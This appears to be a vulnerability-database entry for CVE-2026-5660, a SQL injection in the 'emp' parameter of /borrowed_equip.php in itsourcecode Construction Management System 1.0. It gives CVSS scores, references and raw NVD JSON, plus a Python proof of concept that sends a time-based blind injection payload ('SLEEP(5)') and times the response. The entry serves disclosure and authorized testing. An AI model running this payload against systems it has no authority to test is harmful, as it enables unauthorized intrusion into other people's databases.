CVE-2026-5660

Description

A vulnerability was determined in itsourcecode Construction Management System 1.0. The impacted element is an unknown function of the file /borrowed_equip.php of the component Parameter Handler. This manipulation of the argument emp causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

itsourcecode Construction Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sqli_vuln(target_url):
    """
    Proof of Concept for CVE-2026-5660 SQL Injection
    Target: /borrowed_equip.php?emp=
    """
    # Time-based blind SQL injection payload
    payload = "1' AND SLEEP(5)-- -"
    
    # Construct the full request URL
    # Assuming the parameter is passed via GET based on typical PHP vulns
    params = {
        "emp": payload
    }

    try:
        print(f"[*] Sending request to {target_url}...")
        response = requests.get(target_url, params=params, timeout=10)
        
        # Check if the response time indicates a delay (injection success)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability confirmed! The application responded with a delay.")
        else:
            print("[-] Vulnerability not detected based on timing.")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost/borrowed_equip.php"
    check_sqli_vuln(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5660
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5660
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5660/
[4] VulDB https://vuldb.com/cve/CVE-2026-5660
[5] https://github.com/Learner636/CVE-smbmit/issues/4
[6] https://itsourcecode.com/
[7] https://vuldb.com/submit/786062
[8] https://vuldb.com/vuln/355484
[9] https://vuldb.com/vuln/355484/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5660", "sourceIdentifier": "[email protected]", "published": "2026-04-06T14:16:26.363", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in itsourcecode Construction Management System 1.0. The impacted element is an unknown function of the file /borrowed_equip.php of the component Parameter Handler. This manipulation of the argument emp causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/Learner636/CVE-smbmit/issues/4", "source": "[email protected]"}, {"url": "https://itsourcecode.com/", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/786062", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/355484", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/355484/cti", "source": "[email protected]"}]}}